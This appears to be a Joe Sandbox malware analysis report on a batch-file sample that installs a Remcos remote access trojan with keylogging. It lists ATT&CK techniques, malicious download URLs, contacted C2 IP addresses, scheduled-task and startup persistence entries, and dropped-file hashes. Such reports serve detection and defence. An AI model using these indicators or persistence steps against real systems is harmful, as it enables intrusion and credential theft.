
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-LOARC0

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BC2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		33_2_00BC2263
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BC1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		33_2_00BC1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	21 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	57 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	141 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9W9jJCj9EV.bat	7%	Virustotal		Browse
9W9jJCj9EV.bat	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\677826\Prostores.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf6	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFI	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipr	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfd	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.))	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip~	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tin	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/msword.zip	msword.exe, 0000000F.00000002.1734013282.0000000002280000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1732489885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1758622177.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1757907965.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1760983280.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1761710944.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827537331.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.bat	true	Avira URL Cloud: malware	unknown
https://g.live.com/odclientsettings/Prod-C:	svchost.exe, 00000007.00000003.1397678041.000001AA08683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/W2.pdf	choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.bat	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdf6	tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipr	tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFI	cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP	cmd.exe, 0000001E.00000002.1785009950.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.))	tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000007.00000002.2574487359.000001AA08400000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 00000019.00000000.1775153431.0000000000555000.00000002.00000001.01000000.00000009.sdmp, CineBlend.scr, 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp, CineBlend.scr, 00000025.00000002.1934138128.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 0000000F.00000000.1716029840.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe, 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmp, msword.exe.14.dr	false		high
https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tin	msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	false		high
https://myguyapp.com/W2.pdfd	tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zip~	choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.237.33.50	unknown	Netherlands		8455	ATOM86-ASATOM86NL	false
193.26.115.39	unknown	Netherlands		46261	QUICKPACKETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584358
Start date and time:	2025-01-05 08:55:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9W9jJCj9EV.bat renamed because original name is a hash value
Original Sample Name:	e8dfdb915a523a09e139aaa900991ddd.bat
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winBAT@62/101@0/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 77 Number of non-executed functions: 310
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 23.56.254.164, 23.209.209.135, 2.22.50.144, 2.22.50.131, 4.175.87.197, 20.242.39.171, 2.16.168.105, 2.16.168.107, 13.95.31.18, 23.200.0.21, 23.200.0.33, 192.168.2.9, 172.202.163.200, 13.107.246.45, 50.16.47.176, 23.47.168.24
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:56:05	API Interceptor	95x Sleep call for process: powershell.exe modified
02:56:09	API Interceptor	2x Sleep call for process: svchost.exe modified
02:56:17	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
02:56:43	API Interceptor	1x Sleep call for process: msword.exe modified
02:57:56	API Interceptor	32x Sleep call for process: Prostores.com modified
07:56:49	Task Scheduler	Run new task: Troubleshooting path: wscript s>//B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
07:56:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
193.26.115.39	c2.hta	Get hash	malicious	Remcos	Browse
193.26.115.39	c2.hta	Get hash	malicious	Remcos	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
QUICKPACKETUS	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	193.31.28.181
	3e88PGFfkf.exe	Get hash	malicious	DCRat	Browse	185.230.138.58
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.22.235.170
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	198.22.243.54
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	172.98.171.129
	surfex.exe	Get hash	malicious	RedLine	Browse	185.218.125.157
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	armv5l.elf	Get hash	malicious	Mirai	Browse	23.133.3.186

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	RisingStrip.exe	Get hash	malicious	Vidar	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	MatAugust.exe	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4932031419870138
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaW:cJhXC9lHmutpJyiRDeJ/aUKrDgnmE
MD5:	6CDBFCE53CF1966E924E7FB7D874F55F
SHA1:	D31F6B53B6F309E55B3B7E31937C65087DAC8DA5
SHA-256:	288F94118230010A9B83E8560C715358BC9E262AD2713F95A7EF8F9565DA6140
SHA-512:	E2586DCABD1D4B07510FC24748F9BF9DEFF5C718BBDF02E310A284BC9389264913BE014727A0D960F29C8D90689706C08272BEC5C164FA1F738A8C1D745332E6
Malicious:	false
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0869e2b2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7216816491232872
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:TazaNvFv8V2UW/DLzN/w4wZi
MD5:	748119E12EA8E86BA3A3F84B2A3E97BB
SHA1:	5AA7C3B281D61F1CEDC2B145C1342CCEF63D8C30
SHA-256:	EB96ABC7143C98CCCA42C0CAB79FCCB62DCF362F7C1D23A3312EA3FDB46D0137
SHA-512:	8FCA4A2B8A9AA737E1483CC7FDD2509EE3061C86EAA39196FA5C4E2FB06DB276301A8B26E3150F9D5D504B26D84E5817E5640F44B55096174FF21E3BB070490D
Malicious:	false
Preview:	.i.... ...............X\...;...{......................p.D..........{}..8...}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................65..8...}.......................8...}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08130118033330276
Encrypted:	false
SSDEEP:	3:xAyYeYlAssgvT/fgsCrZClW/tCULn6/Xoll+SHY/Xl+/rQLve:SyzwAsZLfgs3Ggsn6QAS4M
MD5:	D30DEFA58B2A84DF89AD530253A2E22B
SHA1:	FD91D5736F3D05528FBC2DB69658666EECF15C9B
SHA-256:	06540377C72A5D125DA4FC19B15802D412351BDE523F0247132A64910391A1B6
SHA-512:	73464E5DD9C440B2C8CC68DF38F990121A860CF1127DB946E0F901EF12687B4C33D5B4C7A94F77686F1C927FA3D56A6679CCBEF9259306A41D65F17D331C3E7E
Malicious:	false
Preview:	,h.......................................;...{...8...}.......{}..............{}......{}.vv_Q.....{}......................8...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.3517416054053633
Encrypted:	false
SSDEEP:	3:rglsmHQlIXZU5JWRal2Jl+7R0DAlBG45klovDl6v:Mlsmwld5YcIeeDAlOWAv
MD5:	2D40E4F2C23F5F384B437383B6733A5D
SHA1:	00E786DF6DF67B0D32D135BC3E5726FA0FD3ED28
SHA-256:	30543988E2A91B9D4D38B43995B8A0B4C3CDAAB8FF8A2D9521BF24794BEB9A56
SHA-512:	746F6F10A131B306E6C3AD582FC2A4CF7A030A3656759D6600C0316ADB1309E40A3F151388821B42FC03597E713E6A48684BD8BCE394D7CB4F83DA8122B29834
Malicious:	true
Preview:	....[.2.0.2.5./.0.1./.0.5. .0.2.:.5.7.:.2.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.156037321572476
Encrypted:	false
SSDEEP:	6:iOHjJcM+q2PqLTwi2nKuAl9OmbnIFUttjHJZmwDjHcMVkwOqLTwi2nKuAl9Ombjd:7SM+v8wZHAahFUtf/EMV5TwZHAaSJ
MD5:	DE7C1888AB727AC638011B6DEBB7B06E
SHA1:	3177569616E3A166CABCFFB4606F8E79CA510138
SHA-256:	8D1C45BF4BB5AA4C66538F6B0CED11988C72A10B0EF65C69551663A026230066
SHA-512:	887E8EA9CD5FA7098B9ED5839B60329BE05A0A6214D0F269AEFCA745511015A8D8DB457773F9C97965466BE2EE3ACDB8B0349F03272B0F1AF3BA7E59D6D3D1F4
Malicious:	false
Preview:	2025/01/05-02:56:09.850 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-02:56:09.856 1c6c Recovering log #3.2025/01/05-02:56:09.856 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	290
Entropy (8bit):	5.156037321572476
Encrypted:	false
SSDEEP:	6:iOHjJcM+q2PqLTwi2nKuAl9OmbnIFUttjHJZmwDjHcMVkwOqLTwi2nKuAl9Ombjd:7SM+v8wZHAahFUtf/EMV5TwZHAaSJ
MD5:	DE7C1888AB727AC638011B6DEBB7B06E
SHA1:	3177569616E3A166CABCFFB4606F8E79CA510138
SHA-256:	8D1C45BF4BB5AA4C66538F6B0CED11988C72A10B0EF65C69551663A026230066
SHA-512:	887E8EA9CD5FA7098B9ED5839B60329BE05A0A6214D0F269AEFCA745511015A8D8DB457773F9C97965466BE2EE3ACDB8B0349F03272B0F1AF3BA7E59D6D3D1F4
Malicious:	false
Preview:	2025/01/05-02:56:09.850 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-02:56:09.856 1c6c Recovering log #3.2025/01/05-02:56:09.856 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.15901920570984
Encrypted:	false
SSDEEP:	6:iOHj4i4q2PqLTwi2nKuAl9Ombzo2jMGIFUttj6u9JZmwDj6u9DkwOqLTwi2nKuAv:7sBv8wZHAa8uFUt1H/TV5TwZHAa8RJ
MD5:	7385453860BFE0624B1012A3C792C6A3
SHA1:	1F7493C3742A6476CC42AE0EC36E00D432AC7317
SHA-256:	0BEB7A97B33BAED8462C9BAEAECD04D360EEDE8FC1C1275A7F68E3A83CD51659
SHA-512:	D226DD0FCC06043FF6F90A9DFC8E9D4CE9DB82360A5B70CD28DFCE63D7EFB454BF9E11C9D95E93FD2794032570F9168404FE7C29493E41591288F73A3387CC41
Malicious:	false
Preview:	2025/01/05-02:56:09.881 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:56:09.883 1b80 Recovering log #3.2025/01/05-02:56:09.883 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.15901920570984
Encrypted:	false
SSDEEP:	6:iOHj4i4q2PqLTwi2nKuAl9Ombzo2jMGIFUttj6u9JZmwDj6u9DkwOqLTwi2nKuAv:7sBv8wZHAa8uFUt1H/TV5TwZHAa8RJ
MD5:	7385453860BFE0624B1012A3C792C6A3
SHA1:	1F7493C3742A6476CC42AE0EC36E00D432AC7317
SHA-256:	0BEB7A97B33BAED8462C9BAEAECD04D360EEDE8FC1C1275A7F68E3A83CD51659
SHA-512:	D226DD0FCC06043FF6F90A9DFC8E9D4CE9DB82360A5B70CD28DFCE63D7EFB454BF9E11C9D95E93FD2794032570F9168404FE7C29493E41591288F73A3387CC41
Malicious:	false
Preview:	2025/01/05-02:56:09.881 1b80 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-02:56:09.883 1b80 Recovering log #3.2025/01/05-02:56:09.883 1b80 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5eda6a78-637f-453d-ac42-024a9335877d.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.975824910517686
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqqDsBdOg2HYqAAcaq3QYiub5P7E4T3y:Y2sRdsjEdMHYqAr3QYhbt7nby
MD5:	52C36B6C95AE766D19A6FFF6F80D8824
SHA1:	E0F6688F6A4CA0F7496886DC4663F112C0269FD5
SHA-256:	264242502072929B8B7E238E2405176568FA6F03EFA5A1D8E1CA31D824179689
